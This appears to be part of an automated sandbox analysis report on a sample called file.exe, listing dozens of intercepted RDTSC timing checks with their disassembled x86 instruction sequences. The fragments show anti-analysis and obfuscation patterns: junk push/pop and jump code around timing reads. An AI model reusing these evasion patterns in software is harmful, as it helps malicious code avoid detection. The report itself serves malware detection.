                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B0049 second address: 10B004F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B004F second address: 10B0054 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B0054 second address: 10B0059 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B01B8 second address: 10B01CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F72FCF2ACCEh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B07B0 second address: 10B07B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B07B6 second address: 10B07EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F72FCF2ACD2h 0x0000000b popad 0x0000000c push edx 0x0000000d jmp 00007F72FCF2ACCCh 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F72FCF2ACCCh 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B7D53 second address: 10B7D57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B7D57 second address: 10B7D6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F72FCF2ACC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jc 00007F72FCF2ACCEh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B6F5B second address: 10B6F61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B6F61 second address: 10B6F6D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B6F6D second address: 10B6F71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B71B7 second address: 10B71BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B71BB second address: 10B71C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B71C5 second address: 10B71EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F72FCF2ACD4h 0x00000007 push edi 0x00000008 jmp 00007F72FCF2ACCAh 0x0000000d pop edi 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B7380 second address: 10B7398 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F72FCC0D44Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007F72FCC0D446h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B7648 second address: 10B7657 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F72FCF2ACC6h 0x00000009 pushad 0x0000000a popad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B7657 second address: 10B7670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007F72FCC0D44Ch 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B7670 second address: 10B7674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B7674 second address: 10B767A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B767A second address: 10B7680 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C2C24 second address: 10C2C28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C2C28 second address: 10C2C2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C2C2E second address: 10C2C38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C2C38 second address: 10C2C3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C3577 second address: 10C3582 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F72FCC0D446h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C3582 second address: 10C358E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F72FCF2ACC6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C358E second address: 10C3596 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C3596 second address: 10C359E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C3BF3 second address: 10C3BF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C3BF9 second address: 10C3C57 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jp 00007F72FCF2ACC6h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pop edi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007F72FCF2ACCFh 0x00000014 push esi 0x00000015 jmp 00007F72FCF2ACD4h 0x0000001a jo 00007F72FCF2ACC6h 0x00000020 pop esi 0x00000021 jl 00007F72FCF2ACC8h 0x00000027 pushad 0x00000028 popad 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d jmp 00007F72FCF2ACD8h 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CBD9D second address: 10CBDA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CBDA1 second address: 10CBDA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CBF0B second address: 10CBF1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007F72FCC0D44Ch 0x0000000d jg 00007F72FCC0D446h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CE7C7 second address: 10CE7CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CE625 second address: 10CE629 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CE629 second address: 10CE62F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CE62F second address: 10CE635 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CE635 second address: 10CE63F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F72FCF2ACC6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D8E9C second address: 10D8EA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DC98E second address: 10DC996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DC996 second address: 10DC99B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DC99B second address: 10DC9CC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jno 00007F72FCF2ACC6h 0x00000009 ja 00007F72FCF2ACC6h 0x0000000f pop ebx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 jc 00007F72FCF2ACC6h 0x0000001b pop edi 0x0000001c jmp 00007F72FCF2ACD5h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DC9CC second address: 10DC9E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F72FCC0D44Eh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E6192 second address: 10E61AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F72FCF2ACCCh 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E61AB second address: 10E61D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 jmp 00007F72FCC0D44Fh 0x0000000e pushad 0x0000000f popad 0x00000010 jnp 00007F72FCC0D446h 0x00000016 popad 0x00000017 pushad 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E7844 second address: 10E784A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E784A second address: 10E7854 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E7854 second address: 10E7859 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E7859 second address: 10E7865 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jno 00007F72FCC0D446h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E7865 second address: 10E7869 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E7869 second address: 10E7891 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F72FCC0D452h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jnc 00007F72FCC0D44Ch 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E7891 second address: 10E78B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F72FCF2ACD6h 0x00000007 jbe 00007F72FCF2ACCCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F0692 second address: 10F0699 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F3076 second address: 10F307B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F307B second address: 10F3086 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F3086 second address: 10F308A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FC0EB second address: 10FC0FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007F72FCC0D452h 0x0000000b jbe 00007F72FCC0D446h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FA908 second address: 10FA90C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FA90C second address: 10FA915 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FAC29 second address: 10FAC4C instructions: 0x00000000 rdtsc 0x00000002 jng 00007F72FCF2ACC8h 0x00000008 pushad 0x00000009 push edi 0x0000000a pop edi 0x0000000b pushad 0x0000000c popad 0x0000000d push esi 0x0000000e pop esi 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F72FCF2ACCAh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FAC4C second address: 10FAC50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FAC50 second address: 10FAC75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007F72FCF2ACC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F72FCF2ACD5h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FB39B second address: 10FB3B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F72FCC0D446h 0x0000000a popad 0x0000000b jmp 00007F72FCC0D44Fh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FB3B5 second address: 10FB3BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F72FCF2ACC6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1111B66 second address: 1111B7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jnl 00007F72FCC0D44Eh 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1111B7C second address: 1111B82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11082BB second address: 11082D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F72FCC0D44Fh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11082D5 second address: 11082F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F72FCF2ACD8h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111FC57 second address: 111FC61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F72FCC0D446h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111FC61 second address: 111FC6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111FC6C second address: 111FC79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F72FCC0D446h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111FC79 second address: 111FC7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111FC7F second address: 111FC85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111FC85 second address: 111FC89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111FC89 second address: 111FC93 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F72FCC0D446h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112E57C second address: 112E584 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112E584 second address: 112E589 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112E589 second address: 112E593 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F72FCF2ACCCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112E724 second address: 112E728 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112E728 second address: 112E732 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112E732 second address: 112E736 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112EDA1 second address: 112EDAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jo 00007F72FCF2ACC6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1130880 second address: 1130886 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1135F60 second address: 1135F66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113624B second address: 1136280 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jp 00007F72FCC0D446h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov edx, 6F945F5Ah 0x00000012 push 00000004h 0x00000014 mov dx, cx 0x00000017 call 00007F72FCC0D449h 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F72FCC0D453h 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1136280 second address: 11362EC instructions: 0x00000000 rdtsc 0x00000002 js 00007F72FCF2ACC8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push ebx 0x0000000f push eax 0x00000010 pop eax 0x00000011 pop ebx 0x00000012 ja 00007F72FCF2ACC8h 0x00000018 popad 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d pushad 0x0000001e jmp 00007F72FCF2ACD5h 0x00000023 pushad 0x00000024 jnc 00007F72FCF2ACC6h 0x0000002a jmp 00007F72FCF2ACD6h 0x0000002f popad 0x00000030 popad 0x00000031 mov eax, dword ptr [eax] 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F72FCF2ACD3h 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11362EC second address: 11362F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1136606 second address: 113660F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113660F second address: 1136613 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1137FA1 second address: 1137FAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F72FCF2ACC6h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1137FAE second address: 1137FBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F72FCC0D446h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1137FBA second address: 1137FBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11399B9 second address: 11399BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF02DB second address: 4EF02E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF02E1 second address: 4EF02F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF02F2 second address: 4EF02F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF0386 second address: 4EF038B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF038B second address: 4EF03B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 22910CC6h 0x00000008 movsx ebx, si 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F72FCF2ACD5h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF03B1 second address: 4EF03B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF03B7 second address: 4EF03BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
